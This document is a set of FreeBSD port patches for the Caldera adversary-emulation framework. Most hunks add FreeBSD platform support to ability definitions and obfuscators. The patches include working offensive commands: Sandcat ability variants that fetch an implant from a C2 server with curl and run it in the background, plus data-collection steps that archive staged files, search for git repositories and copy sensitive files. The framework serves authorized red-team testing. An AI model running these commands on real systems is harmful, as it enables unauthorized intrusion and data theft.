plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml +@@ -28,7 +28,7 @@ + - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml new file mode 100644 index 000000000000..1fa277437813 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_b419604e-6f82-40a4-b215-12f8c8156c2f.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml +@@ -25,7 +25,7 @@ + - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.parent_guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml new file mode 100644 index 000000000000..2879ff2bff30 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_elastic__hunting_bf565e6a-0037-4aa4-852f-1afa222c76db.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml +@@ -22,7 +22,7 @@ + - source: host.process.guid
+ edge: has_interesting
+ target: investigate.process.guid
+- linux:
++ freebsd,linux:
+ elasticsearch:
+ *cmd
+ darwin:
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml new file mode 100644 index 000000000000..85edefaa30f9 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml +@@ -8,7 +8,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + kill -9 #{host.pid.unauthorized} +@@ -25,4 +25,4 @@ + taskkill /pid #{host.pid.unauthorized} /f + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.pid.unauthorized +\ No newline at end of file ++ - source: host.pid.unauthorized diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml new file mode 100644 index 000000000000..e28abe22f8d4 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/2ca64acd-dc12-4cc8-b78a-6a182508a50b.yml +@@ -7,7 +7,7 @@ + attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ if ! test -f hosts_backup; then cp /etc/hosts hosts_backup; fi;
+@@ -27,4 +27,4 @@ + if (-not (Test-Path -Path .\hosts_backup)) { Copy-Item -Path c:\windows\system32\drivers\etc\hosts -Destination .\hosts_backup; };
+ Add-Content c:\windows\system32\drivers\etc\hosts "127.0.0.1`t#{remote.suspicious.url}";
+ cleanup: |
+- Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force +\ No newline at end of file ++ Move-Item -Path .\hosts_backup -Destination c:\windows\system32\drivers\etc\hosts -Force
diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml new file mode 100644 index 000000000000..26f61e8f83cd --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/32e563bb-ba06-4bcc-b817-fc2c434c0b66.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + crontab -u #{host.user.name} -l > temp_crontab; +@@ -35,4 +35,4 @@ + edge: has_new_cronjob + target: host.new.cronjob + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.new.cronjob +\ No newline at end of file ++ - source: host.new.cronjob diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml new file mode 100644 index 000000000000..72c7f5fec0b7 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_bf01fdc9-d801-4461-81df-e511efb3c1fc.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/bf01fdc9-d801-4461-81df-e511efb3c1fc.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + directory="#{directory.sensitive.path}"; +@@ -40,4 +40,4 @@ + - plugins.stockpile.app.requirements.paw_provenance: + - source: directory.sensitive.backup + - plugins.stockpile.app.requirements.paw_provenance: +- - source: directory.sensitive.path +\ No newline at end of file ++ - source: directory.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml new file mode 100644 index 000000000000..f87d3e750316 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_response_e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/response/e846973a-767b-4f9c-8b9e-5249cfcd7b97.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + cp -f /tmp/sensitive_file_backups/#{file.backup.name} #{file.sensitive.path} +@@ -31,4 +31,4 @@ + - plugins.stockpile.app.requirements.paw_provenance: + - source: file.backup.name + - plugins.stockpile.app.requirements.paw_provenance: +- - source: file.sensitive.path +\ No newline at end of file ++ - source: file.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml new file mode 100644 index 000000000000..fb7e82cf61c0 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_243053d2-13c1-47f0-832d-6ef02ba95e1a.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/243053d2-13c1-47f0-832d-6ef02ba95e1a.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml new file mode 100644 index 000000000000..fa5a362e9b9e --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_2ed3c315-2022-499e-a844-1bbd119d0abe.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/2ed3c315-2022-499e-a844-1bbd119d0abe.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + output=""; +@@ -87,4 +87,4 @@ + } + requirements: + - plugins.response.app.requirements.source_fact: +- - source: directory.sensitive.path +\ No newline at end of file ++ - source: directory.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml new file mode 100644 index 000000000000..966f5dfa6125 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/34bc0116-13b6-4dd5-b681-9554c2a1fa95.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -67,4 +67,4 @@ + Remove-Item -Recurse -Force C:\Users\Public\sensitive_file_backups; + requirements: + - plugins.response.app.requirements.source_fact: +- - source: file.sensitive.path +\ No newline at end of file ++ - source: file.sensitive.path diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml new file mode 100644 index 000000000000..fac4b766aaa3 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/622e4bda-e5a8-42bb-93d9-a7b1eebc7e41.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -104,4 +104,4 @@ + then rm -f $file; + fi; + done; +- rm -rf /tmp/sensitive_file_backups; +\ No newline at end of file ++ rm -rf /tmp/sensitive_file_backups; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml new file mode 100644 index 000000000000..5d580c3b3239 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_ba907d7a-b334-47e7-b652-4e481b5aa534.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/ba907d7a-b334-47e7-b652-4e481b5aa534.yml +@@ -7,7 +7,7 @@ + attack_id: x + name: x + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + echo '' > /tmp/cron_jobs; +@@ -32,4 +32,4 @@ + cat /tmp/cron_jobs | sort > /tmp/baseline_cronjobs_list.txt; + rm /tmp/cron_jobs; + cleanup: | +- rm -f /tmp/baseline_cronjobs_list.txt +\ No newline at end of file ++ rm -f /tmp/baseline_cronjobs_list.txt diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml new file mode 100644 index 000000000000..372ec13b4851 --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_df9d2b83-b40f-4167-af75-31ddde59af7e.yml @@ -0,0 +1,18 @@ +--- plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/df9d2b83-b40f-4167-af75-31ddde59af7e.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p /tmp/sensitive_file_backups; +@@ -100,4 +100,4 @@ + do if [ ! -s $file ]; + then rm -f $file; + fi; +- done; +\ No newline at end of file ++ done; diff --git a/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml b/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml new file mode 100644 index 000000000000..c6a553602a4a --- /dev/null +++ b/security/caldera/files/patch-plugins_response_data_abilities_setup_f313a0d7-2327-4f69-8da4-a6efd6135121.yml @@ -0,0 +1,11 @@ +--- plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml.orig 2021-10-13 20:41:40 UTC ++++ plugins/response/data/abilities/setup/f313a0d7-2327-4f69-8da4-a6efd6135121.yml +@@ -7,7 +7,7 @@ + name: x + repeatable: False + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + output=""; diff --git a/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py b/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py new file mode 100644 index 000000000000..78a4a9429abf --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_app_sand__svc.py @@ -0,0 +1,14 @@ +--- plugins/sandcat/app/sand_svc.py.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/app/sand_svc.py +@@ -56,7 +56,10 @@ class SandService(BaseService): + ), + linux=dict( + cflags='CGO_ENABLED=1' +- ) ++ ), ++ freebsd=dict( ++ cflags='CGO_ENABLED=1' ++ ), + ) + if which('go') is not None: + if platform in compile_options.keys(): diff --git a/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml b/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml new file mode 100644 index 000000000000..051959d4ca5c --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_data_abilities_command-and-control_2f34977d-9558-4c12-abad-349716777c6b.yml @@ -0,0 +1,45 @@ +--- plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/data/abilities/command-and-control/2f34977d-9558-4c12-abad-349716777c6b.yml +@@ -80,6 +80,42 @@ + curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name}; + chmod +x #{agents.implant_name}; + ./#{agents.implant_name} -server $server -listenP2P -v ++ freebsd: ++ sh: ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -group red -v ++ variations: ++ - description: Deploy as a blue-team agent instead of red ++ command: | ++ server="#{app.contact.http}"; ++ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -server $server -group blue & ++ - description: Download with a random name and start as a background process ++ command: | ++ server="#{app.contact.http}"; ++ agent=$(curl -svkOJ -X POST -H "file:sandcat.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; ++ nohup ./$agent -server $server & ++ - description: Compile red-team agent with a comma-separated list of extensions (requires GoLang). ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:#{agent.extensions}" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -group red -v ++ - description: Download with GIST C2 ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:gist" -H "c2:gist" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -c2 GIST -v ++ - description: Deploy as a P2P agent with known peers included in compiled agent ++ command: | ++ server="#{app.contact.http}"; ++ curl -s -X POST -H "file:sandcat.go" -H "platform:freebsd" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > #{agents.implant_name}; ++ chmod +x #{agents.implant_name}; ++ ./#{agents.implant_name} -server $server -listenP2P -v + windows: + psh: + command: | diff --git a/security/caldera/files/patch-plugins_sandcat_update-agents.sh b/security/caldera/files/patch-plugins_sandcat_update-agents.sh new file mode 100644 index 000000000000..1d3129337293 --- /dev/null +++ b/security/caldera/files/patch-plugins_sandcat_update-agents.sh @@ -0,0 +1,16 @@ +--- plugins/sandcat/update-agents.sh.orig 2022-07-20 19:48:00 UTC ++++ plugins/sandcat/update-agents.sh +@@ -1,10 +1,11 @@ +-#!/bin/bash ++#!/bin/sh + # generates payloads for each os + +-function build() { ++build() { + GOOS=windows go build -o ../payloads/sandcat.go-windows -ldflags="-s -w" sandcat.go + GOOS=linux go build -o ../payloads/sandcat.go-linux -ldflags="-s -w" sandcat.go + GOOS=darwin go build -o ../payloads/sandcat.go-darwin -ldflags="-s -w" sandcat.go ++GOOS=freebsd go build -o ../payloads/sandcat.go-freebsd -ldflags="-s -w" sandcat.go + } + cd gocat && build + cd .. diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py new file mode 100644 index 000000000000..2b4e23a8b9a4 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__basic.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_basic.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_basic.py +@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py new file mode 100644 index 000000000000..281c9eecfc2a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__jumble.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_jumble.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_jumble.py +@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + def run(self, link, **kwargs): diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py new file mode 100644 index 000000000000..f74f3385ccad --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_base64__no__padding.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/base64_no_padding.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/base64_no_padding.py +@@ -8,7 +8,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + def run(self, link, **kwargs): diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py new file mode 100644 index 000000000000..2d448ea635d0 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_caesar__cipher.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/caesar_cipher.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/caesar_cipher.py +@@ -10,7 +10,8 @@ class Obfuscation(BaseObfuscator): + return dict( + windows=['psh'], + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ diff --git a/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py new file mode 100644 index 000000000000..38c1030761f3 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_app_obfuscators_steganography.py @@ -0,0 +1,12 @@ +--- plugins/stockpile/app/obfuscators/steganography.py.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/app/obfuscators/steganography.py +@@ -14,7 +14,8 @@ class Obfuscation(BaseObfuscator): + def supported_platforms(self): + return dict( + darwin=['sh'], +- linux=['sh'] ++ linux=['sh'], ++ freebsd=['sh'] + ) + + """ EXECUTORS """ diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml new file mode 100644 index 000000000000..06f0a024d805 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_02de522f-7e0a-4544-8afc-0c195f400f5f.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml +@@ -15,7 +15,7 @@ + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd +- linux: ++ freebsd,linux: + sh: + command: | + pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g' diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml new file mode 100644 index 000000000000..1d2d2ed87474 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_10fad81e-3f68-47be-83b6-fbee7711c6a9.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +@@ -33,7 +33,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.dir.staged +- linux: ++ freebsd,linux: + sh: + command: | + chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}' diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml new file mode 100644 index 000000000000..08bc5028608a --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_30a8cf10-73dc-497c-8261-a64cc9e91505.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +@@ -8,7 +8,7 @@ + attack_id: T1560.001 + name: "Archive Collected Data: Archive via Utility" + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg +@@ -29,4 +29,4 @@ + - source: host.dir.compress + requirements: + - plugins.stockpile.app.requirements.paw_provenance: +- - source: host.dir.staged +\ No newline at end of file ++ - source: host.dir.staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml new file mode 100644 index 000000000000..f93fa21c439d --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_4e97e699-93d7-4040-b5a3-2e906a58199e.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +@@ -12,7 +12,7 @@ + sh: + command: | + cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} +- linux: ++ freebsd,linux: + sh: + command: | + cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml new file mode 100644 index 000000000000..43e4ef8bb20b --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_6469befa-748a-4b9c-a96d-f191fde47d89.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +@@ -17,7 +17,7 @@ + parsers: + plugins.stockpile.app.parsers.basic: + - source: host.dir.staged +- linux: ++ freebsd,linux: + sh: + command: | + mkdir -p staged && echo $PWD/staged diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml new file mode 100644 index 000000000000..a5bf3dd80e57 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_720a3356-eee1-4015-9135-0fc08f7eb2d5.yml @@ -0,0 +1,18 @@ +--- plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +@@ -6,7 +6,7 @@ + attack_id: T1005 + name: Data from Local System + platforms: +- linux: ++ freebsd,linux: + sh: + command: | + for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do +@@ -21,4 +21,4 @@ + Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0; + parsers: + plugins.stockpile.app.parsers.basic: +- - source: host.dir.git +\ No newline at end of file ++ - source: host.dir.git diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml new file mode 100644 index 000000000000..45cd636b78b1 --- /dev/null +++ b/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_89955f55-529d-4d58-bed4-fed9e42515ec.yml @@ -0,0 +1,11 @@ +--- plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml.orig 2022-09-14 02:24:22 UTC ++++ plugins/stockpile/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +@@ -12,7 +12,7 @@ + sh: + command: | + curl #{remote.host.socket} +- linux: ++ freebsd,linux: + sh: + command: | + curl #{remote.host.socket} diff --git a/security/caldera/files/patch-plugins_stockpile_data_abilities_collection_90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml 